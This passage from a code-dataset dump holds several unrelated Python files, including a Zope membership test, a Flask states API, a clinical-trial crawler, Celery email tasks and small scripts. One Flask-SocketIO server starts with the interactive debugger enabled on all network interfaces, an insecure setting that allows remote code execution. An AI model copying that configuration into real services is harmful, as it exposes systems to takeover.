'Jos_H_orig_' + method + '_' + str(k) + '.pkl')\n save(leave_out_orig, dir + 'Jos_L_orig_' + method + '_' + str(k) + '.pkl')\n\n # # BLACK\n # print('black...')\n # historgrams_black, leave_out_black = build_database(BLACKS, k=k, method=method)\n # dir = 'Jos_histograms/black/'\n # save(historgrams_black, dir + 'Jos_H_black_' + method + '_' + str(k) + '.pkl')\n # save(leave_out_black, dir + 'Jos_L_black_' + method + '_' + str(k) + '.pkl')\n #\n # # WHITE\n # print('white...')\n # historgrams_white, leave_out_white = build_database(WHITES, k=k, method=method)\n # dir = 'Jos_histograms/white/'\n # save(historgrams_white, dir + 'Jos_H_white_' + method + '_' + str(k) + '.pkl')\n # save(leave_out_white, dir + 'Jos_L_white_' + method + '_' + str(k) + '.pkl')\n","sub_path":"extract_hist.py","file_name":"extract_hist.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235231471","text":"from unittest import TestCase, TestSuite, makeSuite, main\n\nimport Zope\ntry:\n Zope.startup()\nexcept AttributeError:\n # for Zope versions before 2.6.1\n pass\ntry:\n from Interface.Verify import verifyClass\nexcept ImportError:\n # for Zope versions before 2.6.0\n from Interface import verify_class_implementation as verifyClass\n\nfrom Products.CMFCore.PortalFolder import PortalFolder\nfrom Products.CMFCore.tests.base.dummy import DummyFolder as DummyFolderBase\nfrom Products.CMFCore.tests.base.dummy import DummyTool\nfrom Products.CMFCore.tests.base.dummy import DummyUserFolder\nfrom Products.CMFCore.tests.base.testcase import SecurityTest\n\nfrom Products.CMFDefault.MembershipTool import MembershipTool\n\n\nclass DummyFolder(DummyFolderBase):\n def manage_addPortalFolder(self, id, title=''):\n self._setObject( id, DummyFolder() )\n def changeOwnership(self, user):\n pass\n def manage_setLocalRoles(self, userid, roles):\n pass\n def getPhysicalRoot(self):\n return self\n def unrestrictedTraverse(self, path, default=None, restricted=0):\n return self.acl_users\n\nclass MembershipToolTests(TestCase):\n\n def setUp(self):\n self.site = DummyFolder()\n self.mtool = MembershipTool().__of__(self.site)\n\n def test_createMemberarea(self):\n mtool = self.mtool\n self.site._setObject( 'Members', DummyFolder() )\n self.site._setObject( 'acl_users', DummyUserFolder() )\n self.site._setObject( 'portal_workflow', DummyTool() )\n self.site.user_bar = 'test attribute'\n mtool.createMemberarea('user_foo')\n self.failUnless( hasattr(self.site.Members.aq_self, 'user_foo') )\n mtool.createMemberarea('user_bar')\n self.failUnless( hasattr(self.site.Members.aq_self, 'user_bar'),\n 'CMF Collector issue #102 (acquisition bug)' )\n\n def test_MembersFolder_methods(self):\n mtool = self.mtool\n self.assertEqual( mtool.getMembersFolder(), None )\n self.site._setObject( 'Members', DummyFolder() )\n self.assertEqual( mtool.getMembersFolder(), self.site.Members )\n mtool.setMembersFolderById(id='foo')\n self.assertEqual( mtool.getMembersFolder(), None )\n self.site._setObject( 'foo', DummyFolder() )\n self.assertEqual( mtool.getMembersFolder(), self.site.foo )\n mtool.setMembersFolderById()\n self.assertEqual( mtool.getMembersFolder(), None )\n\n def test_interface(self):\n from Products.CMFDefault.interfaces.portal_membership \\\n import portal_membership as IMembershipTool\n from Products.CMFCore.interfaces.portal_actions \\\n import ActionProvider as IActionProvider\n\n verifyClass(IMembershipTool, MembershipTool)\n verifyClass(IActionProvider, MembershipTool)\n\n\nclass MembershipToolSecurityTests(SecurityTest):\n\n def setUp(self):\n SecurityTest.setUp(self)\n self.site = DummyFolder()\n self.site.id = 'testSite'\n self.mtool = MembershipTool().__of__(self.site)\n\n def test_createMemberarea(self):\n mtool = self.mtool\n self.site._setObject( 'Members', PortalFolder('Members') )\n self.site._setObject( 'acl_users', DummyUserFolder() )\n self.site._setObject( 'portal_workflow', DummyTool() )\n mtool.createMemberarea('user_foo')\n\n f = self.site.Members.user_foo\n ownership = self.site.acl_users.user_foo\n localroles = ( ( 'user_foo', ('Owner',) ), )\n self.assertEqual( f.getOwner(), ownership )\n self.assertEqual( f.get_local_roles(), localroles,\n 'CMF Collector issue #162 (LocalRoles broken): %s'\n % str( f.get_local_roles() ) )\n self.assertEqual( f.index_html.getOwner(), ownership,\n 'CMF Collector issue #162 (Ownership broken): %s'\n % str( f.index_html.getOwner() ) )\n self.assertEqual( f.index_html.get_local_roles(), localroles,\n 'CMF Collector issue #162 (LocalRoles broken): %s'\n % str( f.index_html.get_local_roles() ) )\n\n\ndef test_suite():\n return TestSuite((\n makeSuite( MembershipToolTests ),\n makeSuite( MembershipToolSecurityTests )\n ))\n\nif __name__ == '__main__':\n main(defaultTest='test_suite')\n","sub_path":"CMF/tags/1.4.7/CMFDefault/tests/test_MembershipTool.py","file_name":"test_MembershipTool.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175265134","text":"#!/usr/bin/python3\n\"\"\"Module to create a flask route\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request, Blueprint\nfrom models import storage\nfrom models.state import State\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\ndef statesGetter():\n \"\"\"View all the states\"\"\"\n Allstate = []\n for states in storage.all(\"State\").values():\n Allstate.append(states.to_dict())\n return jsonify(Allstate)\n\n\n@app_views.route('/states/', methods=['GET'],\n strict_slashes=False)\ndef stateGetter(state_id):\n \"\"\"View a specific state\"\"\"\n state = storage.get(\"State\", state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())\n\n\n@app_views.route('/states/', methods=['DELETE'],\n strict_slashes=False)\ndef stateDeleter(state_id):\n \"\"\"delete a state\"\"\"\n delete_state = storage.get(\"State\", state_id)\n if delete_state is None:\n abort(404)\n delete_state.delete()\n storage.save()\n return (jsonify({}))\n\n\n@app_views.route('/states/', methods=['POST'], strict_slashes=False)\ndef statePoster():\n \"\"\"creates a new state\"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n if \"name\" not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing name\"}), 400)\n new_state = State(**request.get_json())\n new_state.save()\n return make_response(jsonify(new_state.to_dict()), 201)\n\n\n@app_views.route('/states/', methods=['PUT'],\n strict_slashes=False)\ndef stateUpdater(state_id):\n \"\"\"Update created state\"\"\"\n state_update = storage.get(\"State\", state_id)\n if state_update is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n for key, value in request.get_json().items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(state_update, key, value)\n state_update.save()\n return jsonify(state_update.to_dict())\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"104277717","text":"import re\nimport copy\nimport logging\nfrom urllib2 import urlparse\nfrom datetime import datetime,timedelta\nfrom cgi import parse_qsl\nfrom urllib import urlencode\nfrom tgimport import tg\nfrom baseconnector import BaseConnector\nfrom utils.utils import stripHtml, get_hash\nfrom utils.decorators import logit\nfrom utils.sessioninfomanager import checkSessionInfo, updateSessionInfo\n\nlog = logging.getLogger('TrialSearchConnector')\nclass TrialSearchConnector(BaseConnector):\n @logit(log , 'fetch')\n def fetch(self):\n baseuri = 'http://apps.who.int/trialsearch/crawl/'\n if 'crawl0' in self.currenturi:\n self.__setSoupForCurrentUri()\n linkinfo = self.soup.find('table',id='DataList1').findAll('tr',recursive = False)\n links = [baseuri + each.find('td',recursive = 'False').find('a')['href'] for each in linkinfo] \n if not links:\n log.info(self.log_msg('No Links found'))\n return False\n for link in links[:]: \n self.currenturi = link\n self.__setSoupForCurrentUri()\n for eachlink in [ x['href'] for x in self.soup.find('table',id= 'DataList1').findAll('a')][:]:\n temp_task = self.task.clone()\n log.info(eachlink)\n temp_task.instance_data['uri'] = eachlink\n self.linksOut.append(temp_task)\n## self.__createTasksForLinks() \n log.exception(self.log_msg('LINKSOUT: ' + str(len(self.linksOut))))\n #self.linksOut = [] \n else:\n self.__addInfo() \n return True \n \n## except:\n## log.exception(self.log_msg('can not find the data %s'))\n## return False\n## return True\n## self.__createTasksForLinks()\n \n## log.exception(self.log_msg('LINKSOUT: ' + str(len(self.linksOut))))\n## self.linksOut = [] \n \n @logit(log, '__addInfo')\n def __addInfo(self):\n self.__task_elements_dict = {\n 'priority':self.task.priority,\n 'level': self.task.level,\n 'last_updated_time':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'pickup_date':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'connector_instance_log_id': self.task.connector_instance_log_id,\n 'connector_instance_id':self.task.connector_instance_id,\n 'workspace_id':self.task.workspace_id,\n 'client_id':self.task.client_id,\n 'client_name':self.task.client_name,\n 'versioned':False,\n 'category':self.task.instance_data.get('category',''),\n 'task_log_id':self.task.id }\n try:\n unique_key = self.currenturi\n #self.currenturi = nextlink\n log.info(self.log_msg('current uri: %s'%self.currenturi))\n if checkSessionInfo('review', self.session_info_out, unique_key, \\\n self.task.instance_data.get('update'),parent_list\\\n = [self.currenturi]):\n log.info(self.log_msg('Session info returns True for uri %s'\\\n %unique_key))\n return False\n self.__setSoupForCurrentUri() \n page = self.__getData()\n #self.pages.append(page)\n #log.info(self.log_msg('Page added'))\n if not page:\n return True\n result = updateSessionInfo('review', self.session_info_out, \n unique_key,get_hash( page ),'forum', self.task.instance_data.get('update')\\\n ,parent_list=[self.currenturi])\n if result['updated']:\n page['path'] = [ self.currenturi]\n page['parent_path'] = []\n page['uri']= self.currenturi \n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page['entity'] = 'post'\n #log.info(page)\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n log.info(self.log_msg('Page added'))\n else:\n log.info(self.log_msg('Update session info returns False for \\\n url %s'%self.currenturi))\n except:\n log.exception(self.log_msg('Cannot add the post for the uri %s'\\\n %self.currenturi))\n return True \n \n \n @logit(log, '__getData')\n def __getData(self):\n \n page = {}\n \n try:\n page['title'] = stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find title'))\n \n try:\n page['data'] = stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find data')) \n \n try:\n page['posted_date'] = datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('can not find posted date')) \n \n try:\n page['et_trial_register'] = stripHtml(self.soup.find('td',text =re.compile('Register:')).findNext('td').renderContents())\n except:\n log.exception(self.log_msg('can not find register'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Last refreshed on:')).findNext('td').renderContents())\n page['edate_mainrecord_last_update'] = datetime.strftime(datetime.strptime(date_str,'%d %B %Y'),\"%Y-%m-%dT%H:%M:%SZ\")\n \n except:\n log.exception(self.log_msg('can not find last update')) \n \n try:\n page['et_mainrecord_nctid'] = stripHtml(self.soup.find('td',text =re.compile('Main ID:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Date of registration:')).findNext('td').renderContents())\n if '-' in date_str:\n split_char = '-'\n elif '/' in date_str:\n split_char = '/'\n if len(date_str.split(split_char)[-1])==4:\n char_order = ['%d', '%m', '%Y']\n else:\n char_order = ['%Y', '%m', '%d']\n page['edate_mainrecord_trial_registration_date'] = datetime.strftime(datetime.strptime(date_str, split_char.join(char_order)), \"%Y-%m-%dT%H:%M:%SZ\")\n except:\n log.exception(self.log_msg('can not find registration date'))\n \n \n try:\n page['et_mainrecord_lead_sponsor'] = stripHtml(self.soup.find('td',text =re.compile('Primary sponsor:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Primary sponsor'))\n \n try:\n page['et_mainrecord_brief_title'] = stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find title')) \n \n try:\n page['et_mainrecord_official_title'] = stripHtml(self.soup.find('td',text =re.compile('Scientific title:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find scientific title'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n if '-' in date_str:\n split_char = '-'\n elif '/' in date_str:\n split_char = '/'\n if len(date_str.split(split_char)[-1])==4:\n char_order = ['%d', '%m', '%Y']\n else:\n char_order = ['%Y', '%m', '%d']\n page['edate_mainrecord_enrolment'] = datetime.strftime(datetime.strptime(date_str, split_char.join(char_order)), \"%Y-%m-%dT%H:%M:%SZ\")\n## try:\n#### date_str = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n#### page['et_mainrecord_enrolment'] = datetime.strftime(datetime.strptime(date_str,'%d/%m/%Y'),\"%Y-%m-%dT%H:%M:%SZ\")\n## page['et_mainrecord_enrolment'] = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n except:\n log.exception(self.log_msg('can not find Date of first enrolment'))\n \n try:\n page['et_trial_target_sample_size'] = stripHtml(self.soup.find('td',text =re.compile('Target sample size:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Target sample size'))\n try:\n page['et_mainrecord_recruitment_status'] = stripHtml(self.soup.find('td',text =re.compile('Recruitment status:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Recruitment status'))\n \n try:\n page['et_mainrecord_url'] = stripHtml(self.soup.find('td',text =re.compile('URL:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find URL'))\n \n try:\n page['et_mainrecord_study_type'] = stripHtml(self.soup.find('td',text =re.compile('Study type:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Study type'))\n \n \n try:\n page['et_mainrecord_study_design'] = stripHtml(self.soup.find('td',text =re.compile('Study design:')).findNext('td').renderContents()) \n \n except:\n log.exception(self.log_msg('can not find Study design'))\n \n \n try:\n page['et_trial_countries_of_recruitment'] = stripHtml(self.soup.find('span',text =re.compile('Countries of recruitment')).findParent('tr').findNext('tr').find('span').renderContents())\n \n \n except:\n log.exception(self.log_msg('can not find countries for recruitment'))\n \n try:\n contactinfo = self.soup.find('table',id = re.compile('DataList4')).findAll('tr',recursive = False)[1]\n datainfo = [x for x in contactinfo.findAll('td',recursive = False) if stripHtml(x.renderContents())]\n if datainfo:\n tab =datainfo[0].find('table').findAll('tr') \n try:\n page['et_mainrecord_responsible_contact_person_first_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*FirstnameLabel')).renderContents())\n page['et_mainrecord_responsible_contact_person_last_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*LastnameLabel')).renderContents())\n except:\n log.exception(self.log_msg('can no find contact person name1'))\n try:\n page['et_trial_responsible_contact_person_address'] = stripHtml(tab[1].find('td',text =re.compile('Address:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact address'))\n \n try:\n page['et_trial_responsible_contact_person_telephone_no'] = stripHtml(tab[2].find('span',id =re.compile('\\w*TelephoneLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact Telephone no1'))\n \n try:\n page['et_trial_responsible_contact_person_email'] = stripHtml(tab[3].find('span',id =re.compile('\\w*EmailLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact email1'))\n \n try:\n page['et_trial_responsible_contact_person_affiliation'] = stripHtml(tab[4].find('span',id =re.compile('\\w*AffiliationLabel')).renderContents())\n log.info(page['et_trial_responsible_contact_person_affiliation'])\n except:\n log.exception(self.log_msg('can not find contact affiliation1'))\n \n \n if len(datainfo)>=2:\n tab =datainfo[1].find('table').findAll('tr') \n try:\n page['et_mainrecord_research_contact_person_first_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*FirstnameLabel')).renderContents())\n #log.info(page['et_mainrecord_research_contact_person_first_name'])\n page['et_mainrecord_research_contact_person_last_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*LastnameLabel')).renderContents())\n except:\n log.exception(self.log_msg('can no find contact person name1'))\n try:\n page['et_trial_research_contact_person_address'] = stripHtml(tab[1].find('span',id =re.compile('\\w*AddressLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact address'))\n \n try:\n page['et_trial_research_contact_person_telephone_no'] = stripHtml(tab[2].find('span',id =re.compile('\\w*TelephoneLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact Telephone no2'))\n \n try:\n page['et_trial_research_contact_person_email'] = stripHtml(tab[3].find('span',id =re.compile('\\w*EmailLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact email2'))\n \n try:\n page['et_trial_research_contact_person_affiliation'] = stripHtml(tab[4].find('span',id =re.compile('\\w*AffiliationLabel')).renderContents())\n #log.info(page['et_contact_affiliation2'])\n except:\n log.exception(self.log_msg('can not find contact affiliation2'))\n \n \n except:\n log.exception(self.log_msg('can no find contact info'))\n \n try:\n page['et_mainrecord_patient_inclusion'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Inclusion_criteriaLabel')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find inclusion criteria not found'))\n \n try:\n page['et_mainrecord_patient_exclusion'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Exclusion_criteriaLabel')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find exclusion criteria not found')) \n \n try:\n page['et_mainrecord_min_age'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label8')).renderContents()) \n except:\n log.exception(self.log_msg('can not find min age'))\n \n try:\n page['et_mainrecord_max_age'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label11')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find max age'))\n \n## try:\n## page['et_mainrecord_gender'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label8')).renderContents()) \n## \n## except:\n## log.exception(self.log_msg('can not find gender'))\n try:\n page['et_mainrecord_condition_summary'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Condition_FreeTextLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find health condition'))\n try:\n intervention = self.soup.find('table', id=re.compile('DataList10')).findAll('tr')[1:]\n\n page['et_mainrecord_interventions'] = [stripHtml(each.find('span').renderContents()) for each in intervention]\n except:\n log.exception(self.log_msg('can not find interventions'))\n \n try:\n prioutcomes = self.soup.find('table', id=re.compile('DataList12')).findAll('tr')[1:]\n page['et_mainrecord_primary_outcomes'] = [stripHtml(each.find('span').renderContents()) for each in prioutcomes]\n except:\n log.exception(self.log_msg('can not find primary outcomes'))\n \n try:\n secoutcomes = self.soup.find('table', id=re.compile('DataList14')).findAll('tr')[1:] \n page['et_mainrecord_secondary_outcomes'] = [stripHtml(each.find('span').renderContents()) for each in secoutcomes]\n except:\n log.exception(self.log_msg('can not find sec outcomes'))\n \n try:\n secid = self.soup.find('table', id=re.compile('DataList16')).findAll('tr')[1:] \n page['et_trial_secondary_id'] = [stripHtml(each.find('span').renderContents()) for each in secid]\n log.info(page['et_trial_secondary_id'])\n \n except:\n log.exception(self.log_msg('can not find sec id'))\n \n try:\n src_support = self.soup.find('table', id=re.compile('DataList18')).findAll('tr')[1:]\n page['et_trial_source_of_monetary_support'] = [stripHtml(each.find('span').renderContents()) for each in src_support]\n except:\n log.exception(self.log_msg('can not find source for support')) \n \n try:\n secsponsor = self.soup.find('table', id=re.compile('DataList20')).findAll('tr')[1:] \n page['et_mainrecord_secondary_sponsor'] = [stripHtml(each.find('span').renderContents()) for each in secsponsor]\n \n except:\n log.exception(self.log_msg('can not find sec sponser'))\n \n return page \n \n @logit(log, '__setSoupForCurrentUri') \n def __setSoupForCurrentUri(self, data=None, headers={}):\n \"\"\"It will set soup object for the Current URI\n \"\"\"\n res = self._getHTML(data=data, headers=headers)\n if res:\n self.rawpage = res['result']\n else:\n log.info(self.log_msg('Page Content cannot be fetched for the url: \\\n %s'%self.currenturi))\n raise Exception('Page content not fetched for th url %s'%self.currenturi)\n self._setCurrentPage() \n \n ","sub_path":"crawler/connectors/trialsearchconnector.py","file_name":"trialsearchconnector.py","file_ext":"py","file_size_in_byte":19306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518037364","text":"#uses port 5000 to avoid needing sudo\r\n\r\n#dependency: pip install flask-socketio\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_socketio import SocketIO,join_room, emit, send \r\nfrom threading import Thread\r\nimport json\r\nfrom kivy.logger import Logger\r\nfrom process_control import pr_cont\r\nimport gh_db_manager\r\n\r\nimport time\r\n\r\nclass gh_webserver(Thread):\r\n \r\n \r\n def __init__(self,statusgrid,gio):\r\n Thread.__init__(self)\r\n self.statusgrid=statusgrid\r\n self.daemon=True\r\n self.__running=True\r\n self.app=Flask(__name__)\r\n self.socketio=SocketIO(self.app)\r\n self._log_fn=Logger.info\r\n self._gio=gio\r\n self._db_manager=self._gio.get_db_manager()\r\n \r\n\r\n def term(self):\r\n self.__running=False\r\n \r\n def __del__(self):\r\n #add any tidy-up here\r\n pass\r\n \r\n def run(self):\r\n pr_cont.set_name(\"gh_webserver\") #allows process to be idenfified in htop\r\n app=self.app\r\n socketio=self.socketio\r\n \r\n #----------------------\r\n @app.route('/')\r\n def index():\r\n data=self.statusgrid.get_table_data()\r\n return render_template('status.html',data=data)\r\n \r\n #----------------------\r\n def send_newdata(data):\r\n #self._log_fn(\"gh_webserver.on_newdata: Sending Data to Webserver\")\r\n socketio.emit(\"on_newdata\",json.dumps(data),broadcast=True)\r\n \r\n #---------------------- \r\n @socketio.on('get_table_data')\r\n def send_table_data():\r\n data=self.statusgrid.get_table_data()\r\n self._log_fn(\"gh_webserver.get_table_data: Sending Whole Table\")\r\n emit('on_tabledata',json.dumps(data))\r\n \r\n #set the callback in the statusgrid control\r\n self.statusgrid.set_webserver_newdata_fn(send_newdata)\r\n \r\n #----------------------\r\n @app.route('/graph1')\r\n def graph1():\r\n return render_template('graph1.html')\r\n \r\n #---------------------- \r\n @socketio.on('get_graph_raw_data')\r\n def get_graph_raw_data(tname,pname,xmin,xmax):\r\n db=self._db_manager.get_database(tname,pname)\r\n data=db.get_raw_line(xmin,xmax)\r\n print('gh_webserver.get_graph_raw_data(',tname,',',pname,',',xmin,',',xmax,')')\r\n #self._log_fn('gh_webserver.get_graph_raw_data(',tname,',',pname,',',xmin,',',xmax,')')\r\n emit('on_graphrawdata',json.dumps(data))\r\n \r\n #----------------------\r\n if __name__ == '__main__':\r\n self.socketio.run(self.app,\r\n host='0.0.0.0', port=5000, debug=True, use_debugger=False,\r\n use_reloader=False)\r\n else: #kivy mode\r\n from logging import Logger\r\n Logger.manager.loggerDict['werkzeug'] = Logger.manager.loggerDict['kivy']\r\n self.socketio.run(self.app,\r\n host='0.0.0.0', port=5000, debug=True, use_debugger=True,\r\n use_reloader=False)\r\n #----------------------\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n server=gh_webserver()\r\n server.start()\r\n while True:\r\n time.sleep(10)","sub_path":"gh_webserver.py","file_name":"gh_webserver.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470518841","text":"import sys, os, math\nsys.path.append('..')\nfrom DBConnection.MongoDBConnection import MongoDB\nimport numpy as np\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\n\ndef getTopicsBagOfWords():\n topicsBagOfWords = []\n for temporalSlice in db.query(\"TemporalSlice\").sort('start', 1):\n for i in range(0, len(temporalSlice['topics'])):\n topicsBagOfWords += [word['word'] for word in temporalSlice['topics'][i]]\n\n return {item: idx for idx, item in enumerate(set(topicsBagOfWords))}\n\nwith MongoDB(\"TesiMagistrale\") as db:\n topicsBagOfWords = getTopicsBagOfWords()\n\n # Cicla su ogni slice temporale\n for temporalSlice in db.query(\"TemporalSlice\").sort('start', 1):\n yearWordSenseDict = {}\n # Cicla su ogni topic e su ogni parola al suo interno\n for i in range(0, len(temporalSlice['topics'])):\n for selectWord in temporalSlice['topics'][i]:\n # Crea un vettore sparso per ogni parola selezionata che ne rappresenta il senso\n wordSenseSparseVector = np.zeros(len(topicsBagOfWords), dtype=np.uint8)\n for word in temporalSlice['topics'][i]:\n if word['word'] != selectWord['word']:\n wordSenseSparseVector[topicsBagOfWords[word['word']]] = 1\n\n # Se la parola non è ancora presente nel dizionario dei sensi la inserisce come chiave\n if selectWord['word'] not in yearWordSenseDict:\n yearWordSenseDict[selectWord['word']] = []\n\n # Inserisce il senso per la parola\n yearWordSenseDict[selectWord['word']].append((i+1, wordSenseSparseVector))\n\n print(f\"\\n\\n--------- {temporalSlice['start']}-{temporalSlice['end']} ---------\\n\")\n # Cicla su tutte le parole nel dizionario\n for word, senses in yearWordSenseDict.items():\n if len(senses) > 1:\n print(f\"{word}:\")\n\n i = 0\n # Cicla su tutti i sensi della parola a coppie e ne calcola la cosine similarity\n for topic1, sense1 in senses:\n i += 1\n for topic2, sense2 in senses[i:]:\n print(f\"{topic1}-{topic2} -> {1 - spatial.distance.cosine(sense1, sense2)}\")","sub_path":"venv/Src/4-AnalizeTopics/WordSenseInduction.py","file_name":"WordSenseInduction.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336595988","text":"# Principal\r\nfrom database import BancoDeDados\r\n\r\nif __name__ == \"__main__\":\r\n\r\n banco = BancoDeDados()\r\n banco.conecta()\r\n banco.criarTabelas()\r\n\r\n banco.inserirCliente('Bruno', '11111111111', 'brunoolc@gmail.com')\r\n banco.inserirCliente('Andrelize', '22222222222', 'andrelize@gmail.com')\r\n\r\n banco.buscarClientes('22222222222')\r\n\r\n banco.removerCliente('11111111111')\r\n banco.buscarClientes('11111111111')\r\n print(banco.buscar_email('andrelize@gmail.com'))\r\n banco.desconecta()","sub_path":"ProjetoSQL_BrunoCalheiros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383879914","text":"from random import random\n\nDECK = list(range(1, 101))\nN = 100\nITER = 100\n\n\ndef udiscrete(m, k):\n \"\"\"\n Uniform discrete variable in interval [m, k]\n \"\"\"\n u = random()\n return int(u*(k-m+1))+m\n\n\ndef permutation(x):\n \"\"\"\n Random permutation\n \"\"\"\n N = len(x)\n\n for i in range(N-1, 0, -1):\n # Uniform in [0,i]\n index = udiscrete(0, i)\n tmp = x[index]\n x[index] = x[i]\n x[i] = tmp\n return x\n\n\ndef experiment():\n \"\"\"\n Shuffles a deck of size n = 100, and draw a card one by one.\n Success: If the i-th card is the card N° = i\n \"\"\"\n shuffle_deck = permutation(DECK)\n success = [1 for i in range(len(shuffle_deck)) if shuffle_deck[i] == i + 1]\n\n return sum(success)\n\n\nif __name__ == '__main__':\n\n # Estimate the mean of the success experiments\n success = [experiment() for x in range(ITER)]\n mean = sum(success) / ITER\n print(\"Mean: {}\".format(mean))\n\n # Estimate the mean of the success experiments\n success = [experiment() ** 2 for x in range(ITER)]\n mean2 = sum(success) / ITER\n print(\"Mean2: {}\".format(mean2))\n\n variance = mean2 - (mean ** 2)\n print(\"variance: {}\".format(variance))\n","sub_path":"tp4/ej1.py","file_name":"ej1.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97302222","text":"from celery import shared_task\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.models import User\nimport datetime\n\nfrom .models import Post, Category\n\n\n@shared_task\ndef post_notify(post_id):\n post = Post.objects.get(id=post_id)\n subscribers_list = User.objects.filter(id__in=post.category.all().values('subscriber'))\n\n for user in subscribers_list:\n\n html_content = render_to_string(\n 'news/send_notify_post_create.html',\n {\n 'username': user.username,\n 'post': post,\n 'post_text': post.text[:50],\n }\n )\n\n email_text = EmailMultiAlternatives(\n subject=post.header,\n body='text',\n from_email='nedgalkin@gmail.com',\n to=[user.email],\n )\n email_text.attach_alternative(html_content, \"text/html\")\n email_text.send()\n\n\n@shared_task\ndef weekly_post_notify():\n today_date = datetime.datetime.now()\n week_ago_date = today_date - datetime.timedelta(weeks=1)\n category_list = Category.objects.all()\n\n for category in category_list:\n post_list = Post.objects.filter(category=category, time__range=(week_ago_date, today_date))\n if post_list:\n subscribers_list = category.subscriber.all()\n email_list = list(email['email'] for email in subscribers_list.values('email'))\n\n html_content = render_to_string(\n 'news/send_notify_weekly.html',\n {\n 'post_list': post_list,\n }\n )\n\n email_text = EmailMultiAlternatives(\n subject='Еженедельная рассылка новостей',\n body='text',\n from_email='nedgalkin@gmail.com',\n to=email_list,\n )\n email_text.attach_alternative(html_content, \"text/html\")\n email_text.send()\n","sub_path":"NewsPaper/news/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87619251","text":"from sys import argv\nfrom sys import exit\nimport json\nimport csv\n\n# Fields' indicies 0..n\nclasses = 3\ndescription = 4\n# Fields' separators\nsep_classes = ','\nsep_descitems = '\\n'\n\n# Split functions for complex data strings\ndef parse_classes(item):\n return item.replace(' ', '').split(sep_classes)\n\ndef parse_description(item):\n items = item.split(sep_descitems)\n features = list()\n for feature in items:\n if len(feature) > 